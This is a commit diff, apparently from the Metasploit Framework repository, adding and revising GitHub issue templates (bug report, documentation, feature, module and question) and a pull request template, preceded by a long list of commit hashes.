| a0c472b039 | |||
| d36039bb9c | |||
| 600f4efe4a | |||
| 4ae9c65ecf | |||
| cbdd988a3c | |||
| 8772f3dc77 | |||
| d6d939b2ed | |||
| a950e73f6c | |||
| 47ba1fd177 | |||
| 1676e635f2 | |||
| 77da4d707a | |||
| 4ef90b14f9 | |||
| 041ca23d14 | |||
| a90d745fa4 | |||
| d6755b7221 | |||
| 01a2e1c6ff | |||
| d4f11b45cf | |||
| 33e1c8ffdb | |||
| 9d824ca486 | |||
| 30a937604b | |||
| a143cd26c6 | |||
| 5f8d1ef4fd | |||
| e2e69a5053 | |||
| 7934d1de09 | |||
| a3c07b7cc1 | |||
| 62dd03c348 | |||
| f9410054ea | |||
| f85e9f79c5 | |||
| f339e2e476 | |||
| 6d8fc1dad6 | |||
| 574f6af503 | |||
| 9474b5fda1 | |||
| 182bd67287 | |||
| 94f18cc67a | |||
| 79d3ecc90e | |||
| bea42876ee | |||
| bd835e8f2d | |||
| 2e48fe7e64 | |||
| 8451c1345b | |||
| 126b9e2172 | |||
| ff6a4d7f44 | |||
| 1e7060f06d | |||
| 6dd499a622 | |||
| f848f735a6 | |||
| b18a2fd463 | |||
| f2d3cdca4b | |||
| f3ebd26e73 | |||
| f9ecbc2179 | |||
| b343ac6452 | |||
| 79142cf445 | |||
| f9c8f62491 | |||
| 0316ed7a18 | |||
| 276475c308 | |||
| 3392fa18d4 | |||
| aaa0514b45 | |||
| 97c8df43d2 | |||
| 8012e99c1f | |||
| 87245b9f7a | |||
| 6144b415c6 | |||
| a375c18d77 | |||
| aba7a144b6 | |||
| 54e5983451 | |||
| 5aab28a1a6 | |||
| 859eda92bb | |||
| 8a5049719c | |||
| c6a75222fb | |||
| 7ed37c2e77 | |||
| 3e166f2d3f | |||
| 41d71124c3 | |||
| e8d134fc56 | |||
| 791b51228f | |||
| 92aec23b62 | |||
| f4d8a4dffb | |||
| 1b0665aee4 | |||
| 02e909c6b2 | |||
| 6512ed71b2 | |||
| 90d4351f0d | |||
| 9704448379 | |||
| 23bc62dac3 | |||
| c147541777 | |||
| 8811c51644 | |||
| 79033f5751 | |||
| bc12db45cd | |||
| 362ea8c05b | |||
| 556af54850 | |||
| da22e35ebb | |||
| 2c11ea84e7 | |||
| 954f123e7e | |||
| 1b658aa85f | |||
| b87ed645d9 | |||
| 405e7b108b | |||
| 5f230de3e7 | |||
| 1e90c6117c | |||
| 8209a4e6af | |||
| d9a8ee298f | |||
| 01855dc367 | |||
| 3c329631e6 | |||
| a7f721d18e | |||
| d354cce6e7 | |||
| 0505191b6f | |||
| fb06bc09f5 | |||
| fc85733ec0 | |||
| 60114d3542 | |||
| 28356952cd | |||
| fa5af87f68 | |||
| def95c41ce | |||
| ed89657706 | |||
| d904eed010 | |||
| b86ac7f862 | |||
| 4bcad2b3cf | |||
| 49a2ec9cca | |||
| 7c74ff4b49 | |||
| 97ebe82e6c | |||
| 861b79bce7 | |||
| 0291adf4c7 | |||
| 524b80317d | |||
| 59c2079aa4 | |||
| 46286f8981 | |||
| 2ac177cb39 | |||
| 6a6b99885d | |||
| 5ac0145bb4 | |||
| 92fb321f9f | |||
| 4b1762081f | |||
| 3588c3915b | |||
| a4e11fd311 | |||
| e9e142b573 | |||
| 7bc30ecf39 | |||
| eda3653a51 | |||
| 4f6e2fe84e | |||
| bf8a1fc706 | |||
| 8010da8c04 | |||
| 26fb208852 | |||
| 816a021368 | |||
| 5f0c9942d2 | |||
| 8aa4d7a944 | |||
| 5d158dba15 | |||
| 360e3ef039 | |||
| 10c66b44f4 | |||
| 4a906691da | |||
| e4b0c070a1 | |||
| 50cd69471c | |||
| fb66097212 | |||
| 126d2b3da3 | |||
| c4f05fb566 | |||
| a197b5a891 | |||
| 8139d0a1f1 | |||
| 79abacd186 | |||
| 7400720130 | |||
| 75a0a2ae8a | |||
| bdfe3b3be1 | |||
| 3429e86f40 | |||
| f69d9e0b0d | |||
| f81099709d | |||
| 9b61a02d04 | |||
| ef86d9f74c | |||
| cb5fbdf0c0 | |||
| b9d2b73e3a | |||
| d566fdefae | |||
| db9c718459 | |||
| ebf19051a4 | |||
| 38df0e3a58 | |||
| 95cb694d2f | |||
| bb21c8f6d8 | |||
| dc9e215318 | |||
| f191eb00c9 | |||
| 3fbcfa4100 | |||
| 4c06146900 | |||
| ce69665377 | |||
| 077d7af6a9 | |||
| 2b6815401f | |||
| db2e7bb9d7 | |||
| 4f026bbf84 | |||
| 89e257c722 | |||
| be21ef692d | |||
| 6d5688f120 | |||
| 7827d694fe | |||
| 346b593a18 | |||
| 5dfdf66a0e | |||
| beb53254c7 | |||
| 2da9d54b7b | |||
| 5ce4929834 | |||
| 2bf1f3e9e1 | |||
| ab4e3f9481 | |||
| d5107a1f79 | |||
| 2dcf2b0717 | |||
| 4cfb58a216 | |||
| 37caf96ae9 | |||
| cca3cddb30 | |||
| db6f243305 | |||
| 17d78ecb4b | |||
| 54edd201e4 | |||
| c000ced363 | |||
| e517948f11 | |||
| a69f3eb946 | |||
| ae5c62c279 | |||
| 7b34f07422 | |||
| b3b6450958 | |||
| d92d1448ef | |||
| dbeb6ad32b | |||
| d32640d179 | |||
| 9aafb3b306 | |||
| a0cd00dac7 | |||
| f5c4f593f5 | |||
| fd8420cef7 | |||
| bf9cb3581a | |||
| e7da6e77a5 | |||
| 0b4c047411 | |||
| 260099b506 | |||
| 26b2ec3d84 | |||
| 892cab094a | |||
| bd59321cb1 | |||
| 414035e1e4 | |||
| ee2f792f58 | |||
| 4c93933b6e | |||
| 4fe8f2ce49 | |||
| 0832604131 | |||
| 9954fae7ff | |||
| bf07b1c897 | |||
| d506bdc641 | |||
| 04903daa4c | |||
| 005601f76e | |||
| b1fb946533 | |||
| 8ba7b05eb7 | |||
| 1e03726672 | |||
| 98fdcedf40 | |||
| e5c8f15851 | |||
| fd8ceb0db2 | |||
| 475c24361d | |||
| 219f5bd2d8 | |||
| 30d1259190 | |||
| 88ea6b527a | |||
| 597c97da45 | |||
| 4e81b7b969 | |||
| 288726c177 | |||
| b090bb53cf | |||
| 58780c6db9 | |||
| c6eebe4ca3 | |||
| 6c24ed4c96 | |||
| 3fd1a2cee1 | |||
| ccfb1b92b6 | |||
| 10d5eda489 | |||
| 4975b8d894 | |||
| 81298aaca6 | |||
| 401e000892 | |||
| 5b9e7f5777 | |||
| 8d1ae46012 | |||
| f9af8ed184 | |||
| a2f7551aa7 | |||
| 9bff7de41b | |||
| 62e60fbc81 | |||
| 0493eb2e0e | |||
| 9188b4b9c6 | |||
| 5ccda4b567 | |||
| f6e81bac29 | |||
| 5b2f744cd8 | |||
| fd35ee3860 | |||
| ca239309e4 | |||
| f165527e88 | |||
| 3f9b94c55c | |||
| 40d6dd14c4 | |||
| 6d55ca4040 | |||
| 507864e5e4 | |||
| 19e9848592 | |||
| bbb152a6d8 | |||
| eccee07e8b | |||
| a60652898f | |||
| a4ff847170 | |||
| 11da08a303 | |||
| 922f1ec708 | |||
| 2717683825 | |||
| 98f4642c2d | |||
| 59bd981a70 | |||
| 1321817f66 | |||
| 5d9d3926e4 | |||
| 0efe53d869 | |||
| 126f5ca05d | |||
| 3c46221eb3 | |||
| 44038f1bef | |||
| 0d24757294 | |||
| 3a5db5e492 | |||
| f208d547ed | |||
| ddefafab78 | |||
| dfd4a77e3d | |||
| e643afb681 | |||
| 2a5c43302b | |||
| 8f6331d0d5 | |||
| 02e2072a87 | |||
| eaf8554e69 | |||
| c11be38e1c | |||
| 03ff32210e | |||
| 0806e9ef42 | |||
| 4f6720f962 | |||
| 3ee6f88eca | |||
| c21b90ea61 | |||
| 786c968395 | |||
| edef4a1e47 | |||
| 682653e9d9 | |||
| 1137036ecb | |||
| 55bd3f45be | |||
| 754b42f9f2 | |||
| 6762a7b147 | |||
| e6aa840e64 | |||
| 54928c0e7b | |||
| 4705f9c2dc | |||
| e692edc3b4 | |||
| 9f76f3ef08 | |||
| 12958326b9 | |||
| 1df297da4a | |||
| 34fc7528dd | |||
| 86851e54ff | |||
| 9bac299bc2 | |||
| b1225d4d72 | |||
| ff2421163b | |||
| 5f4de7044f | |||
| 5bbabd6f2a | |||
| 7874308fae | |||
| a8e881452b | |||
| 1807461882 | |||
| 83387212a7 | |||
| 140eef3d0d | |||
| 0b117849d0 | |||
| ed5dd4dd20 | |||
| a908ceb58a | |||
| 5e65021914 | |||
| dfe70ca3fc | |||
| d226025cd9 | |||
| 71f2e4c26c | |||
| f43c547a56 | |||
| 8297a31863 | |||
| 22e3d732a5 | |||
| 44abb63331 | |||
| 8541cab9f6 | |||
| ecba853b29 | |||
| f7d8c43722 | |||
| d2d7486d82 | |||
| 885c8b8a56 | |||
| e6b9610841 | |||
| 2cac8f4e3a | |||
| 5fc0ad0008 | |||
| f56eb13709 | |||
| 3f7aed3c0a | |||
| ab4257eaf2 | |||
| 8f65bfff88 | |||
| 60d86cf25d | |||
| 94f082fe4a | |||
| 204e4d8cdb | |||
| 5081496786 | |||
| 67aefb372e | |||
| 54878d3f68 | |||
| 4f294a5deb | |||
| 77e21de4bd | |||
| 059dd59d90 | |||
| db9626153b | |||
| b9cd724609 | |||
| 2283948fcf | |||
| 364b6c1359 | |||
| 42997be4ae | |||
| f10f5701dd | |||
| a6ee63bb6a | |||
| e8686caa02 | |||
| 47f4f2d981 | |||
| 1f96d3b42f | |||
| 5aa6cf5b42 | |||
| 6e6bb0a838 | |||
| a3e821114a | |||
| 5e1e6e6ab6 | |||
| 0b271f3a0e | |||
| f301676d04 | |||
| bba65ac090 | |||
| def73fb665 | |||
| 0e163c69ab | |||
| 09b1fddbd7 | |||
| a542ce01a1 | |||
| 541f055428 | |||
| 1d5e274deb | |||
| f8752b8e48 | |||
| f3d38e147d | |||
| bd4d3f63e4 | |||
| 7c54066b0e | |||
| 03f31f187b | |||
| b148e9da30 | |||
| d07fc7f6ee | |||
| b19ed20d0a | |||
| a10f51e1f9 | |||
| 9bd6fb9e76 | |||
| e77ae2256b | |||
| 96ae2cf9a2 | |||
| 44e45438f8 | |||
| 2c4b361a6d | |||
| a1b67b20fc | |||
| 48667eda20 | |||
| df48d89923 | |||
| 327440a748 | |||
| 2c3ad585a3 | |||
| fe8cd52c9d | |||
| 66acec6a57 | |||
| 4c004d51a7 | |||
| b85cd9b682 | |||
| c75780350e | |||
| e5f2b48274 | |||
| 8b778bffc0 | |||
| 3a046f01da | |||
| bfd284b349 | |||
| 63f2da278d | |||
| acc7dd153a | |||
| 3b5c6b06a2 | |||
| 9840951f0d | |||
| 87b8182131 | |||
| 56a9b9b637 | |||
| b0bcfc071b | |||
| 8f8ee8947d | |||
| 53de5cc543 | |||
| bbd82865d6 | |||
| 21f4c77787 | |||
| 349051531a | |||
| eb3cf2fd02 | |||
| eb90bee4a7 | |||
| 40cc170578 | |||
| e83dd2b811 | |||
| 2790b72384 | |||
| 4fe7678b01 | |||
| c7ca43b585 | |||
| 8d6468e725 | |||
| 630add538f | |||
| 8f020652cc | |||
| 858adb4540 | |||
| a5db685a83 | |||
| 4e8eefe4ee | |||
| 513338c2e5 | |||
| 5698f6e51f | |||
| 65c2b68319 | |||
| 633899402c | |||
| a15c981246 | |||
| a87a1ae1b4 | |||
| 83132dd733 | |||
| 9f55e4163f | |||
| 3aeb6597a2 | |||
| dd12e65828 | |||
| 5ed87be78e | |||
| 607b7ae5ae | |||
| 7f6f7fea3e | |||
| 9f56867f6c | |||
| 7d1c1f1f16 | |||
| 865d15975b | |||
| 975eb742cb | |||
| 260aa0533a | |||
| c003b0d293 | |||
| 9be6b0a81e | |||
| 498d01aaa3 | |||
| fe1b85a873 | |||
| ba924b3047 | |||
| 4759f7d39d | |||
| 573b8302ec | |||
| a4feaec188 | |||
| b4cac0c414 | |||
| 29dcd0fd81 | |||
| cd6c01ae9d | |||
| fb00818cab | |||
| 5574eaa591 | |||
| 7acad12c3e | |||
| f0630d7479 | |||
| 98a6147403 | |||
| 908ce3d36b | |||
| 8d0816fb37 | |||
| 12faf3fad5 | |||
| c16edad4e6 | |||
| 333b2e66d1 | |||
| cc24a572f5 | |||
| cc974e7f25 | |||
| 694f34cdd9 | |||
| 07cc7deae8 | |||
| 75ca930670 | |||
| 167f1027c4 | |||
| 8a1bb02e80 | |||
| c4b2288f52 | |||
| b3867dc200 | |||
| 26c529b101 | |||
| a2f2af7e97 | |||
| 7c70245807 | |||
| 67792666ef | |||
| 0fd15cb9c1 | |||
| 203b2486ae | |||
| 106ef40376 | |||
| a147ce907b | |||
| e2e6c15c31 | |||
| f58054b24d | |||
| 56d4296041 | |||
| 0b92b6d3f9 | |||
| af734ffafb | |||
| 7c86fb8546 | |||
| 3d77c48eae | |||
| bab5a34b34 | |||
| 25300b9f42 | |||
| 2324e1457d | |||
| 5e3cbaee66 | |||
| 94de45d856 | |||
| 196c354ede | |||
| 60f4787123 | |||
| a248983ca8 | |||
| 327917c015 | |||
| 889f91241a | |||
| dd35086e75 | |||
| 4bb4afcd75 | |||
| 91bcd76776 | |||
| e92b9ef97c | |||
| 9fa339eca8 | |||
| e9c16fb2bb | |||
| 2ef04153b4 | |||
| 1420fa9d8b | |||
| 078652749d | |||
| cc5df836a9 | |||
| cda9fd2a08 | |||
| 29608d13bf | |||
| f60f60db7f | |||
| 755a776a88 | |||
| 5ee7fcaf4a | |||
| 2c0ea83286 | |||
| a4ded39d62 | |||
| c9d9d3af29 | |||
| ea64a6225a | |||
| 0693f17170 | |||
| fc49df003d | |||
| 99ed3afab3 | |||
| ffd5a0b39d | |||
| 280d1767b4 | |||
| 3b1ead48fa | |||
| 22fe846b39 | |||
| 4cd52c5f32 | |||
| f3c6eeceac | |||
| 59aa854c5d | |||
| 8820944696 | |||
| e36db605a6 | |||
| 0292e5c282 | |||
| f2fead66f9 | |||
| 061d76ebed | |||
| b44415a1f6 | |||
| 1b949807c6 | |||
| 31754f71e4 | |||
| af9d2a28de | |||
| 908bdaa5f9 | |||
| 40d068ca8c | |||
| ff8bb2e16f | |||
| ae28463ec6 | |||
| 7d6906b225 | |||
| d5bdfe7253 | |||
| f7a772902b | |||
| d26e281787 | |||
| 89bea26763 | |||
| 353f4281bd | |||
| 664e235e0b | |||
| 071b9598a4 | |||
| 6bac1ec2aa | |||
| 094fe9c134 | |||
| fdf0447ecf | |||
| 5c94910998 | |||
| ee64f38d8c | |||
| 04d54bc786 | |||
| 87ee307183 | |||
| 8190ce7644 | |||
| 6f8d7726ea | |||
| cfd9b12a13 | |||
| fc1f4936ac | |||
| d231c17af8 | |||
| ec828d3be2 | |||
| e5fc41a22f | |||
| a4c97a0a09 | |||
| 320de0ffbf | |||
| 00df264bc9 | |||
| 6f33c9ad99 | |||
| 70927f1db1 | |||
| cff41a6e1c | |||
| b8e19959e0 | |||
| ff9dad2b28 | |||
| 43fd35964c | |||
| f59ec03c42 | |||
| ef8ec13c88 | |||
| 15a4fc7499 | |||
| aac4774551 | |||
| 0da64cd699 | |||
| 5a58fbb0e5 | |||
| d102f3e48f | |||
| adaa9e239a | |||
| 3ab407d947 | |||
| bb7ed355f0 | |||
| 6a07160bd5 | |||
| 011ed3602c | |||
| 7aa89c9d4e | |||
| 8a5db82224 | |||
| 957b2f2163 | |||
| 0b133d28a2 | |||
| c23a4b195e | |||
| b6bd7031f8 | |||
| 7f36cfec84 | |||
| 578bf9999f | |||
| fda8b6df3c | |||
| 83e06ab59e | |||
| 0a1313f183 | |||
| 8a59b8cb1c | |||
| eb60fa1de1 | |||
| 3d388fff0c | |||
| b5be9402b1 | |||
| 2db93c9051 | |||
| 5b0eab476a | |||
| f9077bcd8d | |||
| 5e4b83581a | |||
| 00638f2e41 | |||
| fe0e955dc2 | |||
| f451041d4b | |||
| 9ef6110b54 | |||
| ae6b3d0bf6 | |||
| c9e4ca34c3 | |||
| 57ddd4b37c | |||
| 564895e1a8 | |||
| e4456c9006 | |||
| f483b80849 | |||
| 695f6869df | |||
| f90d605c21 | |||
| 1fe1506b42 | |||
| f6e4b52446 | |||
| c1b2762b03 | |||
| c309e2325f | |||
| de6306fa35 | |||
| f780d94ec6 | |||
| 9c69059a24 | |||
| 962e39148f | |||
| 8425000ff3 | |||
| 73d2b2cf2c | |||
| df277e1406 | |||
| f484e6c83c | |||
| c2f13d906b | |||
| a861ad3f21 | |||
| 739928b56a | |||
| 29f5a1c425 | |||
| de56cde848 | |||
| ee80e9eb34 | |||
| 1aa412ccc0 | |||
| f44f200f49 | |||
| 7a9ecd76c5 | |||
| c5917048fb | |||
| e25cf99ce3 | |||
| 9b52ece7b7 | |||
| 9010446a48 | |||
| db8555e007 | |||
| d670276148 | |||
| ac482a0d31 | |||
| 9980a96917 | |||
| 0d0bd865c8 | |||
| a8af2a227e | |||
| e1cd219d63 | |||
| 4288632203 | |||
| 7dc1315dac | |||
| a016ca4b4f | |||
| ede90ef9a1 | |||
| 89dc1aebf8 | |||
| 0264802756 | |||
| a34ffb3694 | |||
| 6ad9956af8 | |||
| 4fa3b25788 | |||
| 48ebd500b6 | |||
| 028285de77 | |||
| ef108ea71d | |||
| aa1fdb2075 | |||
| 516deaaf49 | |||
| 0d8a86905a | |||
| 5497876fd2 | |||
| 0bf6d3e645 | |||
| 9c987b8271 | |||
| e5befa676f | |||
| 57ef3d9ec6 | |||
| 28e9bc5d14 | |||
| fadb51eae3 | |||
| 7f046a7d89 | |||
| 4de546fa6a | |||
| 62eb756fe2 | |||
| 4c11711a44 | |||
| 6718a7dd78 | |||
| 9aac803f41 | |||
| b76e76b00e | |||
| 6b940a02ca | |||
| 8489bcdfd9 | |||
| c2326f07c9 | |||
| 235861d4ed | |||
| 13784bb35d | |||
| 0459e05420 | |||
| cfd41c49ec | |||
| 1b54d27301 | |||
| 828d974db5 | |||
| 62e5757baa | |||
| 0e9c637364 | |||
| e9f8532a68 | |||
| 226f4b0a53 | |||
| 48ba1026c6 | |||
| f630990b3b | |||
| 36f45d5bf3 | |||
| 808a158c84 | |||
| ac6d0e4391 | |||
| 8167fee11e | |||
| 1db1bed08f | |||
| c80ab651cb | |||
| 0bffcd6212 | |||
| d047feeb03 | |||
| b632a3cc6e | |||
| f5844ee953 | |||
| 3a89bef6c4 | |||
| 9193ace50b | |||
| 351c0d1651 | |||
| e315e207f1 | |||
| d95391b7f4 | |||
| 55d5e55c5e | |||
| 4b92403bba | |||
| 5420007dff | |||
| f6343f35aa | |||
| bb4007747b | |||
| 35dac6ea5f | |||
| 59ed3e5948 | |||
| 2efc381115 | |||
| 6fa086a0ab | |||
| bbbb9565a4 | |||
| d644f2d9c7 | |||
| 0aca3f0712 | |||
| 137fee2570 | |||
| d6c3e4ad56 | |||
| 94287c94ff | |||
| 27effc1b56 | |||
| f61c188e57 | |||
| 7e9bd506d6 | |||
| 1556a603f0 | |||
| 70d365f6c9 | |||
| 07954c0ce2 | |||
| 0e55e20c9c | |||
| da820f08e6 | |||
| 64c4fec0d0 | |||
| 2ca2b5c7bb | |||
| fce70c9284 | |||
| 556ad5f3b7 | |||
| cbcf8a2a68 | |||
| d829f2ab43 | |||
| 6d73b572c7 | |||
| 9e46926a0f | |||
| 785dbb6ba3 | |||
| 8fd3b483d3 | |||
| 946e244c8c | |||
| a7a80e08a8 | |||
| 3395b91c83 | |||
| d7f92a932e | |||
| 65521270ea | |||
| 9c30250161 | |||
| 25d863d912 | |||
| 91add39ceb | |||
| 65951dd97b | |||
| 632cb39c98 | |||
| deb7f4ce14 | |||
| b997e5679f | |||
| c0e34581f2 | |||
| 3707d4caa6 | |||
| a0b6584d19 | |||
| e2f2d55ecc | |||
| 90503b2c61 | |||
| cb372a54f4 | |||
| a05611d756 | |||
| 92d2c8f974 | |||
| eab1245eef | |||
| a9ae212b27 | |||
| 2ad8a02fd7 | |||
| 44030bd784 | |||
| 6557cabd65 | |||
| 5a62630309 | |||
| cbf0d14666 | |||
| 54550dba74 | |||
| 7472a18493 | |||
| b01f02480f | |||
| 10b49979d4 | |||
| 4dcb2fbd96 | |||
| 7a0bf69eb0 | |||
| 763dbf5d5d | |||
| 6c59d7c37c | |||
| 3b258eeb19 | |||
| a5a5ea7ded | |||
| 6b48337f3d | |||
| 793d5c3342 | |||
| 0d36c99151 | |||
| 8c07e17912 | |||
| 3282ec5c55 | |||
| 374396e7fe | |||
| 7f3c0c9314 | |||
| 68565f575f | |||
| 9a8d9c6c88 | |||
| e736588795 | |||
| ab32336544 | |||
| 62c98710ad | |||
| 208e59999a | |||
| abd2c3e1fc | |||
| 995c56098d | |||
| a704f757b7 | |||
| 95941d539e | |||
| e053ed7a1e | |||
| 95fa8602bc | |||
| abf56ae748 | |||
| edb3aa30f8 | |||
| b98c0c6876 | |||
| 81f9fc7608 | |||
| 2bb91a2262 | |||
| dae06ab0c9 | |||
| ddec8a58a1 | |||
| abdcb67189 | |||
| 31a6e0e396 | |||
| d76546f8ee | |||
| 671f2e9616 | |||
| 2360b0e2ff | |||
| 37065f5ffe | |||
| 4fd865f3a9 | |||
| 20386f1aa4 | |||
| 4474b6f6dc | |||
| 13e670ceb3 | |||
| cca3184b36 | |||
| 772431a29e | |||
| 303bddbb37 | |||
| 5f6c9a265f | |||
| a89d9cd188 | |||
| f3e6f562a1 | |||
| 2ce3cb9e86 | |||
| 1ef34283eb | |||
| 6b229177f1 | |||
| c8e5fcf389 | |||
| 1072694130 | |||
| 355b9c135f | |||
| 47b3e9cd94 | |||
| 6f453a0f83 | |||
| 4f94593264 | |||
| 3dd68849c5 | |||
| ca70cc2d27 | |||
| 483c36e54d | |||
| e2d0d8f011 | |||
| 8d4637a42b | |||
| 312a3466ee | |||
| 6504c01668 | |||
| 2907f4ae16 | |||
| b05fe7453f | |||
| 81b8d5b58a | |||
| 551ddc0ce3 | |||
| 2414fda288 | |||
| fcf366e7ce | |||
| dab4291016 | |||
| 2fc1eb10a8 | |||
| 10a5e9292e | |||
| 88b72e6f2e | |||
| 24af710a4e | |||
| aefa9f3984 | |||
| a02f4caabd | |||
| 7a2fba86f1 | |||
| e982f0b890 | |||
| 69fbd195ae | |||
| c1b66aac77 | |||
| 32dafcc9f6 | |||
| 4e75f1862a | |||
| 7cb3ca96e1 | |||
| 34d77e8b11 | |||
| daaa8cf857 | |||
| 4af14109f5 | |||
| 67ae211845 | |||
| d91a166034 | |||
| 195d699df0 | |||
| fc1b337c58 | |||
| 972cb545f0 | |||
| cbd949927d | |||
| f5c36ffd92 | |||
| ef4b72cc5a | |||
| 574bfbed84 | |||
| 9e66afe3e7 | |||
| 299fca4e98 | |||
| 65e2637e29 | |||
| 0387d09e67 | |||
| 8593f68c14 | |||
| cf822bf1c4 | |||
| e3a5f6bcb6 | |||
| ce09435d82 | |||
| 44489f0326 | |||
| 4fb2e92a8f | |||
| daae0886fa | |||
| 65e7354ee6 | |||
| ce01137525 | |||
| f15bbc1340 | |||
| 29b306fedf | |||
| 92accda770 | |||
| 046d8cbedc | |||
| 242cee3060 | |||
| f637254ab2 | |||
| 13cadbf3f1 | |||
| 58bf71d555 | |||
| a3a25b193e | |||
| e0a3af39aa | |||
| c8d4dfee7e | |||
| 3be3a398ae | |||
| 548abf4364 | |||
| 44636f4975 | |||
| 7730c5359d | |||
| 0e076d286e | |||
| f94726a794 | |||
| 02a87befc3 | |||
| 46d759eca9 | |||
| 4ef54518ed | |||
| 04dd5162cf | |||
| a5a3e28984 | |||
| b85b799d4f | |||
| 0a9ca5554a | |||
| 43609965e5 | |||
| b941a1a823 | |||
| bc4f706b0d | |||
| 21dd5f438d | |||
| fc82d508d8 | |||
| e091c8f248 | |||
| 825d93786e | |||
| 8833bddd91 | |||
| dee7e9d690 | |||
| 5f8aaef683 | |||
| e83ae828b5 | |||
| ea0fd7edef | |||
| 5e45c3e469 | |||
| 02d0e36d2a | |||
| 887c0a9dfc | |||
| 790f388fb3 | |||
| 1064aa3f55 | |||
| b9c2ec60f5 | |||
| f874f50748 | |||
| d00d5fbff9 | |||
| 3870dad3d1 | |||
| 510b2f5aac | |||
| d1eaac9932 | |||
| c339662fed | |||
| dd5814654c | |||
| f0b24339fe | |||
| 8549f416f8 | |||
| 1c54430dff | |||
| d3e89869ba |
@@ -1,3 +1,19 @@
|
||||
---
|
||||
name: Bug Report 🐞
|
||||
about: Something isn't working as expected? Here is the right place to report.
|
||||
labels: "bug"
|
||||
---
|
||||
|
||||
<!--
|
||||
Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
|
||||
|
||||
Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
## Steps to reproduce
|
||||
|
||||
How'd you do it?
|
||||
@@ -9,6 +25,10 @@ This section should also tell us any relevant information about the
|
||||
environment; for example, if an exploit that used to work is failing,
|
||||
tell us the victim operating system and service versions.
|
||||
|
||||
## Were you following a specific guide/tutorial or reading documentation?
|
||||
|
||||
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
|
||||
|
||||
## Expected behavior
|
||||
|
||||
What should happen?
|
||||
@@ -38,4 +58,3 @@ Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneli
|
||||
|
||||
What OS are you running Metasploit on?
|
||||
|
||||
|
||||
@@ -0,0 +1,5 @@
|
||||
blank_issues_enabled: false
|
||||
contact_links:
|
||||
- name: Termux Issues?
|
||||
url: https://github.com/rapid7/metasploit-framework/issues/11023
|
||||
about: Termux is not officially supported, check here for more info
|
||||
@@ -0,0 +1,42 @@
|
||||
---
|
||||
name: Documentation 📝
|
||||
about: Suggest better docs coverage for a particular tool or process.
|
||||
labels: "suggestion-docs"
|
||||
---
|
||||
|
||||
<!--
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
## Summary
|
||||
|
||||
What problem(s) did you run into that caused you to request additional documentation? What questions do you think we should answer? What, if any, existing documentation relates to this proposal?
|
||||
|
||||
Some recommended topics to cover:
|
||||
|
||||
- List the topics you think should be here.
|
||||
- This list does not need to be exhaustive!
|
||||
|
||||
### Motivation
|
||||
|
||||
Why should we document this and who will benefit from it?
|
||||
|
||||
## Steps to resolve this issue
|
||||
|
||||
<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
|
||||
|
||||
### Draft the doc
|
||||
|
||||
- [ ] Write the doc, following the format listed in these resources:
|
||||
- [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
|
||||
- [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
|
||||
- [Example of a similar article]()
|
||||
|
||||
### Open a pull request
|
||||
|
||||
- [ ] Open a pull request with your work including the words "closes #[this issue's number]" in the pull request description
|
||||
@@ -0,0 +1,26 @@
|
||||
---
|
||||
name: Feature Suggestion 💡
|
||||
about: Suggest a new idea for the project.
|
||||
labels: "suggestion-feature"
|
||||
---
|
||||
|
||||
<!--
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
## Summary
|
||||
|
||||
Brief explanation of the feature.
|
||||
|
||||
### Basic example
|
||||
|
||||
If the proposal involves a new or changed API, include a basic code example. Omit this section if it's not applicable.
|
||||
|
||||
### Motivation
|
||||
|
||||
Why are we doing this? What use cases does it support? What is the expected outcome?
|
||||
@@ -0,0 +1,26 @@
|
||||
---
|
||||
name: Module Suggestion 📦
|
||||
about: Suggest a new module idea to include in framework.
|
||||
labels: "suggestion-module"
|
||||
---
|
||||
|
||||
<!--
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
## Summary
|
||||
|
||||
Brief explanation of the module.
|
||||
|
||||
### Basic example
|
||||
|
||||
If you have a POC, blog post or any other useful references please let us know in this section.
|
||||
|
||||
### Motivation
|
||||
|
||||
Why are we doing this? What use cases does it support? What is the expected outcome?
|
||||
@@ -0,0 +1,20 @@
|
||||
---
|
||||
name: Question 🤔
|
||||
about: Usage question or discussion about Metasploit.
|
||||
labels: "question"
|
||||
---
|
||||
|
||||
<!--
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
## Summary
|
||||
|
||||
## Relevant information
|
||||
|
||||
<!-- Provide as much useful information as you can -->
|
||||
@@ -1,4 +1,3 @@
|
||||
|
||||
Tell us what this change does. If you're fixing a bug, please mention
|
||||
the github issue number.
|
||||
|
||||
@@ -15,3 +14,20 @@ List the steps needed to make sure this thing works
|
||||
- [ ] **Verify** the thing does not do what it should not
|
||||
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))
|
||||
|
||||
